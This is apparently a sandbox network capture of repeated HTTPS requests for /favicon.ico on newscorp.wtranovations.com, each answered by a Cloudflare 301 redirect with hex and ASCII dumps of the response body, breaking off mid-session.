                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:18 UTC339OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:19 UTC1171INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:19 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:16 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/favicon.ico
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bv04UlwIGsIoU3FRNJr%2FMbrwk7LmBjMjZ1%2Bw6zdMcTIDk4%2BWaxZj3CiNPDlBbTbDaNNCKvCI5O6aCkH%2FG9yZuUJvk%2Fxi6fp3sVAKqQhyUf8P43yznOoJwgQrZ6Mlkm%2B%2BJQUVzfq%2FFJfKQ1qO3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=35&min_rtt=35&rtt_var=17&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=534&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                      Age: 3
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e240a996a9ab7-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=127437&min_rtt=127387&rtt_var=26946&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=917&delivery_rate=31659&cwnd=252&unsent_bytes=0&cid=21065e97a89802e8&ts=317&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:19 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      57192.168.11.1249434104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:19 UTC339OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:19 UTC1171INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:19 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:16 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/favicon.ico
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bv04UlwIGsIoU3FRNJr%2FMbrwk7LmBjMjZ1%2Bw6zdMcTIDk4%2BWaxZj3CiNPDlBbTbDaNNCKvCI5O6aCkH%2FG9yZuUJvk%2Fxi6fp3sVAKqQhyUf8P43yznOoJwgQrZ6Mlkm%2B%2BJQUVzfq%2FFJfKQ1qO3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=35&min_rtt=35&rtt_var=17&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=534&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                      Age: 3
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e240e4d5125e3-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=132712&min_rtt=132611&rtt_var=28133&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=917&delivery_rate=30370&cwnd=252&unsent_bytes=0&cid=227e31f56dbb7409&ts=326&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:19 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      58192.168.11.1249435104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:20 UTC339OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:20 UTC954INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:20 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:16 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/favicon.ico
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bv04UlwIGsIoU3FRNJr%2FMbrwk7LmBjMjZ1%2Bw6zdMcTIDk4%2BWaxZj3CiNPDlBbTbDaNNCKvCI5O6aCkH%2FG9yZuUJvk%2Fxi6fp3sVAKqQhyUf8P43yznOoJwgQrZ6Mlkm%2B%2BJQUVzfq%2FFJfKQ1qO3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      Server-Timing: cfL4;desc="?proto=TCP&rtt=35&min_rtt=35&rtt_var=17&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=534&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Cf-Cache-Status: HIT
                                                                                                                                                                                                                      Age: 4
                                                                                                                                                                                                                      CF-RAY: 923e2411fada3367-MIA
                                                                                                                                                                                                                      2025-03-21 14:29:20 UTC178INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      59192.168.11.1249436104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:20 UTC339OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:20 UTC1150INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:20 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:20 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/favicon.ico
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5YZJ4JRh7YfwpV9jDCuUTAbhe6AsEs21LgXXO10cMymGv%2FuTpKnDC9oCBYFJCjoJXnLdRFEmNUEBpooOjoAtNiCrVQvLQdlULdYstnXgGiImJwFi4zKY0L2eiLXymiHdqBxsl2xtWIMMcNDa2A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=91&min_rtt=91&rtt_var=45&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=534&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      CF-Cache-Status: MISS
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e24156fa5bfbb-ATL
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=113937&min_rtt=113853&rtt_var=24146&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=917&delivery_rate=35378&cwnd=252&unsent_bytes=0&cid=49b8b62b046f938e&ts=320&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:20 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      60192.168.11.1249437104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:21 UTC339OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:21 UTC1171INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:21 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:16 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/favicon.ico
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wRFld%2BI2zNoZK6AQNT997CNZw8zM%2BngQYdfmd%2F2jsIYz7uYTD%2FcU6mFY%2Fe7KUN1QCh7qAMnbra5e5tF6Ll3zbvYfHlAv3mbFbYCLBKZSENXMndsL%2FLXyp0bIJDFQOyUKvXtt6HsH7YT%2Bxs4HkA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=122&min_rtt=122&rtt_var=61&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=534&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                      Age: 5
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e24193aff745a-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=129265&min_rtt=129258&rtt_var=27277&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=917&delivery_rate=31233&cwnd=253&unsent_bytes=0&cid=057f7c85ff4036fa&ts=324&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:21 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      61192.168.11.1249438104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:21 UTC339OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:22 UTC1157INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:22 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:20 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/favicon.ico
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5YZJ4JRh7YfwpV9jDCuUTAbhe6AsEs21LgXXO10cMymGv%2FuTpKnDC9oCBYFJCjoJXnLdRFEmNUEBpooOjoAtNiCrVQvLQdlULdYstnXgGiImJwFi4zKY0L2eiLXymiHdqBxsl2xtWIMMcNDa2A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=91&min_rtt=91&rtt_var=45&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=534&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                      Age: 2
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e241c9f57bf66-ATL
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=114111&min_rtt=114076&rtt_var=24122&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=917&delivery_rate=35348&cwnd=252&unsent_bytes=0&cid=6c97ad2fa78f5e5c&ts=304&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:22 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      62192.168.11.1249439104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:22 UTC339OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:22 UTC954INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:22 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:16 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/favicon.ico
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wRFld%2BI2zNoZK6AQNT997CNZw8zM%2BngQYdfmd%2F2jsIYz7uYTD%2FcU6mFY%2Fe7KUN1QCh7qAMnbra5e5tF6Ll3zbvYfHlAv3mbFbYCLBKZSENXMndsL%2FLXyp0bIJDFQOyUKvXtt6HsH7YT%2Bxs4HkA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      Server-Timing: cfL4;desc="?proto=TCP&rtt=122&min_rtt=122&rtt_var=61&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=534&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Cf-Cache-Status: HIT
                                                                                                                                                                                                                      Age: 6
                                                                                                                                                                                                                      CF-RAY: 923e24204db0db0d-MIA
                                                                                                                                                                                                                      2025-03-21 14:29:22 UTC178INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      63192.168.11.1249440104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:22 UTC339OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:23 UTC954INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:23 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:16 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/favicon.ico
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bv04UlwIGsIoU3FRNJr%2FMbrwk7LmBjMjZ1%2Bw6zdMcTIDk4%2BWaxZj3CiNPDlBbTbDaNNCKvCI5O6aCkH%2FG9yZuUJvk%2Fxi6fp3sVAKqQhyUf8P43yznOoJwgQrZ6Mlkm%2B%2BJQUVzfq%2FFJfKQ1qO3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
